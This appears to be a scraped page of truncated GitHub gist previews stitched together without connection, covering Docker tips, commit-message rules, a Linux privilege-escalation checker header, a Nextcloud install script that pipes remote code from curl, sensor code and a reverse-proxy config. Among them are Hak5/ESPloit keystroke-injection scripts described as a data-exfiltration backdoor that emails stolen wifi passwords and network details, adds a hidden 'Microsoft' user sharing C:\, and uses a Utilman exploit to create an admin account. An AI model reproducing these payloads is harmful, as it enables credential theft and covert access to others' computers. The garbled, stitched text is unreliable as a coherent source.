To install a custom package or modify an existing docker image we need to
- run a docker a container from the image we wish to modify
- modify the docker container
- commit the changes to the container as a docker image
- test changes made to image
# ------ Format ------ | |
# Commit body | |
# ------ Rules ------ | |
# 1. Do not use emoji on the commit message | |
# 2. End the commit message with a period | |
# 3. Capitalize the commit message | |
# 4. Wrap the commit message at 60 characters | |
# ------ Example ------ |
REM:*************************************************** | |
Rem:# Backdoor - Data Exfiltration | |
Rem:# Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner | |
REM:This simple script will grab all of the wifi passwords, external IP address, LAN address, | |
REM:and hostname of the target device and e-mail it to an address of your choice. | |
REM:I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc... | |
REM:It then creates a user called Microsoft, and shares C:\ out to the new user. | |
REM:My goal here was to use one liners to prevent this from being picked up by whitelisting | |
REM:applications (no .bat, .exe, etc...) | |
REM:*************************************************** |
Rem:Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!) | |
Rem:Duckencoder: 1.0 | |
Rem:Target: Windows 7 | |
Rem:Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” REM with the password “hak5”. | |
Rem:Author: Xcellerator | |
Rem:Description: Utilman Exploiter to create a new Admin Account | |
Rem:The new account will be called "Local000". | |
Press:131 | |
CustomDelay:50 | |
Print:cmd |
Rem:Generated by Dckuino.js by NURRL | |
Rem:Modified for use with ESPloit by Corey Harding | |
Rem:----- | |
Rem:# Backdoor - Data Exfiltration | |
Rem:# Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner | |
CustomDelay:1000 | |
Press:131+100 | |
CustomDelay:450 | |
Press:131+114 | |
CustomDelay:450 |
Rem:Generated by Dckuino.js by NURRL | |
Rem:Modified for use with ESPloit by Corey Harding | |
Rem:----- | |
Rem:Start delay | |
CustomDelay:1000 | |
CustomDelay:300 | |
Press:131+114 | |
CustomDelay:300 | |
Print:powershell Start-Process cmd -Verb runAs | |
CustomDelay:300 |
#!/usr/env python | |
############################################################################################################### | |
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
##------------------------------------------------------------------------------------------------------------- | |
## [Details]: | |
## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
## passwords and applicable exploits. |
#!/bin/bash | |
# T&M Hansson IT AB © - 2019, https://www.hanssonit.se/ | |
# shellcheck disable=2034,2059 | |
true | |
# shellcheck source=lib.sh | |
NC_UPDATE=1 && TURN_INSTALL=1 . <(curl -sL https://raw.githubusercontent.com/nextcloud/vm/master/lib.sh) | |
unset NC_UPDATE | |
unset TURN_INSTALL |
To install a custom package or modify an existing docker image we need to
#!/usr/bin/python | |
# DHT Sensor Data-logging to MQTT Temperature channel | |
# Requies a Mosquitto Server Install On the destination. | |
# Copyright (c) 2014 Adafruit Industries | |
# Author: Tony DiCola | |
# MQTT Encahncements: David Cole (2016) | |
# Permission is hereby granted, free of charge, to any person obtaining a copy |
[backends] | |
[backends.hassio] | |
[backends.hassio.servers.nuc] | |
url = "http://YOUR-HASSIO-LOCAL-IP:8123" | |
[frontends] | |
[frontends.hassio] | |
backend = "hassio" | |
[frontends.hassio.routes.hassio] | |
rule = "Host:hassio.yourdomain.com" |